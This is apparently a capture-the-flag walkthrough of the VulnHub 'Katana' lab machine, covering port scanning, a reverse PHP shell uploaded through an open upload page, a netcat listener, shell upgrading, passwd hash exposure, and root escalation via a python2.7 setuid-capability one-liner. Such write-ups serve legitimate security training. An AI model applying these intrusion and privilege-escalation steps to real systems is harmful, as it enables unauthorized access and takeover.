* VulnHub Katana Write Up
Written by @kcasyn

This is a walkthrough for the CTF Katana from VulnHub. This will be done in OSCP test style, so no msf used.

Link: [[https://www.vulnhub.com/series/katana,316/][Katana]]
** Discovery
As always, the best discovery starts with ~nmap~.

#+BEGIN_SRC shell :results code :exports both
nmap -sS -sV -sC -p- 192.168.108.133
#+END_SRC

#+RESULTS:
#+BEGIN_SRC shell
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 22:43 CDT
Nmap scan report for katana.lan (192.168.108.133)
Host is up (0.00049s latency).
Not shown: 65527 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
|   256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
|_  256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Katana X
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open  ssl/http    LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after:  2022-05-11T13:57:36
|_ssl-date: 2020-05-27T03:43:58+00:00; 0s from scanner time.
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
8088/tcp open  http        LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open  http        nginx 1.14.2
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Restricted Content
|_http-server-header: nginx/1.14.2
|_http-title: 401 Authorization Required
MAC Address: 00:0C:29:97:CA:24 (VMware)
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m59s, deviation: 2h00m00s, median: 0s
|_nbstat: NetBIOS name: KATANA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: katana
|   NetBIOS computer name: KATANA\x00
|   Domain name: \x00
|   FQDN: katana
|_  System time: 2020-05-26T23:43:53-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-27T03:43:53
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.83 seconds
#+END_SRC

There's FTP and SSH services, but they seem fairly up to date. Browsing to the various web servers, the one on port 8715 prompts for credentials. Just trying ~admin:admin~ seems to work, but doesn't show anything different from the other web servers. Just a picture of a katana. Using ~gobuster~ to check for interesting directories returned nothing, so let's see if there's any interesting pages. We'll check for ~.html~, ~.php~, and ~.txt~.

#+BEGIN_SRC shell :results code :exports both
gobuster dir -u http://192.168.108.133:8088 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .html,.php,.txt
#+END_SRC

#+RESULTS:
#+BEGIN_SRC shell
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.108.133:8088
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2020/05/27 18:22:05 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/blocked (Status: 301)
/cgi-bin (Status: 301)
/css (Status: 301)
/docs (Status: 301)
/error404.html (Status: 200)
/img (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/phpinfo.php (Status: 200)
/phpinfo.php (Status: 200)
/protected (Status: 301)
/upload.php (Status: 200)
/upload.html (Status: 200)
===============================================================
2020/05/27 18:22:06 Finished
===============================================================
#+END_SRC

** Exploitation
Looks like there's some upload pages on the port 8088 service.

[[./img/upload-page.png]]

Let's try uploading a reverse php shell. Seems to have worked.

[[./img/upload.png]]

Let's set up a ~netcat~ listener with ~nc -lvnp 9000~ and see if we can find where to browse to it.

[[./img/rev-shell.png]]

Success! Looks like it was under the protected area on port ~8715~. Now we have a shell on the box. Let's upgrade our shell first thing.

#+BEGIN_SRC sh
python -c 'import pty;pty.spawn("/bin/bash")'
#+END_SRC

Will get us a pty shell. But it still behaves a little annoying, so use ~Ctrl-Z~ to background the process. Then do ~stty raw -echo~, followed by ~fg~ to bring the shell back. Don't worry if when you type ~fg~ it doesn't show up, it's still there, the terminal is just a bit wonky at the moment. Type ~reset~, and if prompted for terminal type, use ~xterm-256color~. And now we have a fully functioning shell!

#+BEGIN_SRC shell :results code :exports both
id
#+END_SRC

#+RESULTS:
#+BEGIN_SRC shell
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#+END_SRC

We're running as ~www-data~, which is kind of expected. Let's ~cd /tmp~ and do some enumeration with [[https://github.com/rebootuser/LinEnum][LinEnum.sh]]

#+BEGIN_SRC shell
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
#+END_SRC

#+BEGIN_SRC shell :results code :exports both
./LinEnum.sh
#+END_SRC

Lots of info, but this is very interesting:

#+RESULTS:
#+BEGIN_SRC shell
[+] It looks like we have password hashes in /etc/passwd!
root:$6$JkeOP6znuwrdOC5t$bJelXxZClKj0itDA6e5hx4OG5tfA9wa0sWBCe8fcza3i9y5OE8Yw2YrgraoEK7yOigm3ky2k2fUE9GVjqsxwk/:0:0:root:/root:/bin/bash
daemon::1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin::2:2:bin:/bin:/usr/sbin/nologin
sys::3:3:sys:/dev:/usr/sbin/nologin
sync::4:65534:sync:/bin:/bin/sync
games::5:60:games:/usr/games:/usr/sbin/nologin
man::6:12:man:/var/cache/man:/usr/sbin/nologin
lp::7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail::8:8:mail:/var/mail:/usr/sbin/nologin
news::9:9:news:/var/spool/news:/usr/sbin/nologin
uucp::10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy::13:13:proxy:/bin:/usr/sbin/nologin
www-data::33:33:www-data:/var/www:/usr/sbin/nologin
backup::34:34:backup:/var/backups:/usr/sbin/nologin
list::38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc::39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats::41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody::65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt::100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync::101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network::102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve::103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
katana:$6$xHSuywb9JP8nPxSD$IdfUzMr6IAu3gAH0q7kdso5Xzh1DGjvoCtQ5Q2FPgjMRQcZ3BbsH.a35O1v8H.Cwj8.WDUdFD9Hmrnr2f2cun.:1000:1000:katana,,,:/home/katana:/bin/bash
systemd-coredump::999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus::104:110::/nonexistent:/usr/sbin/nologin
sshd::105:65534::/run/sshd:/usr/sbin/nologin
lsadm::998:1001::/:/sbin/nologin
mysql::106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp::107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

[+] Files with POSIX capabilities set:
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
#+END_SRC

** Privilege Escalation
Looks like we have hashed passwords in the ~passwd~ file that we could try and crack, but it also looks like ~python2.7~ has the setuid capability. I had search around for what Linux capabilities are as at this point I hadn't encountered them before. This was a good explanation: [[https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/][Privilege Escalation with Linux Capabilities]]

Using the setuid capability given to ~python2.7~, we can upgrade our shell again to root.

#+BEGIN_SRC shell
python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
#+END_SRC

** Success!
The flag is located at ~/root/root.txt~

[[./img/root.png]]
